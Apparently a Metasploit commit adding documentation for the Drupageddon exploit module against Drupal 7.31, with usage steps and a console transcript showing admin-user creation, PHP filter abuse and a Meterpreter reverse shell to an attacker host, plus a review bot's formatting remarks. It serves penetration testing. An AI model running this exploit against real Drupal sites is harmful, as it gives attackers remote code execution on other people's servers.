Land #7322, drupal_drupageddon module docs
commit
030e09c9c6
@ -0,0 +1,57 @@
## Vulnerable Application
Drupal 7.31 official [download](https://ftp.drupal.org/files/projects/drupal-7.31.tar.gz)
## Verification Steps
1. Install the application
2. Start msfconsole
3. Do: `use exploit/multi/http/drupal_drupageddon`
4. Do: `set rhost <ip>`
5. Do: `run`
6. You should get a shell.
## Scenarios
This is a run against a Drupal 7.31 linux box.
```
msf > use exploit/multi/http/drupal_drupageddon
msf exploit(drupal_drupageddon)
msf exploit(drupal_drupageddon) > set rhost 1.1.1.1
rhost => 1.1.1.1
msf exploit(drupal_drupageddon) > set verbose true
verbose => true
msf exploit(drupal_drupageddon) > exploit
[*] Started reverse TCP handler on 2.2.2.2:4444
[*] Testing page
[*] form_build_id: form-a1VaaaEaa0lUvL79wIAfdQEaaJRw8P7a1aWGXElI_Go
[*] form_token:
[*] password hash: $P\$8zAAApjTciVA2qz7HdAA0UjAAwUft00
[*] Creating new user AaCaUlLaPR:AAgeAAAAjA
[*] Logging in as AaCaUlLaPR:AAgeAAAAjA
[*] cookie: SESS911797186fac11111d08b1111a15db55=aaSfinhC0AAAAbzhAoO3bBaaOerRrvpn3cL0rA77Dhg;
[*] Trying to parse enabled modules
[*] form_build_id: form-YZljDkG8n5AAaAaAaaaYGLaP8MIfdif5VfwjQMMxdN0
[*] form_token: Bj92oAaAaWRwqyAAAySWQpeUI03aA9wfkAozXsk_t_E
[*] Enabling the PHP filter module
[*] Setting permissions for PHP filter module
[*] form_build_id: form-1Z1pAg11amM-1jHALgm1AAAAA1JdwAAA1qXnSTZahPA
[*] form_token: kAA1A1AfqK_PvJQi1AAAAAAAAxyGyLvHemBor1q11Z1
[*] admin role id: 3
[*] Getting tokens from create new article page
[*] form_build_id: form-_-leQaaaAAeBXbAaAAaaAAx1IrYSI1qeA2OGf2Ce1vs
[*] form_token: Ib1y8aAaaAAAdapA53kUcfWf7msTRHiDUb_CIKzAAAA
[*] Calling preview page. Exploit should trigger...
[*] Sending stage (33721 bytes) to 1.1.1.1
[*] Meterpreter session 1 opened (2.2.2.2:4444 -> 1.1.1.1:45388) at 2016-08-25 11:30:41 -0400
meterpreter > sysinfo
Computer : drupal
OS : Linux drupal 2.6.32-642.3.1.el6.x86_64 #1 SMP Sun Jun 26 18:16:44 EDT 2016 x86_64
Meterpreter : php/linux
meterpreter > getuid
Server username: apache (48)
```
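Review bot: In the Scenarios transcript, the line `[*] password hash: $P\$8z...` has a backslash before the second `$`; inside a fenced block that escape is rendered literally, so it should be dropped. The same block also has a bare `msf exploit(drupal_drupageddon)` prompt line with no command after it, and the first `[*] form_token:` is empty while the later ones carry values; remove the stray prompt line and either note that an empty token is expected on the first request or re-capture the output. The Verification Steps do not include the `set verbose true` that the scenario uses, so a reader following the steps may not see the same output, and the document has no Options section describing settings beyond `rhost`.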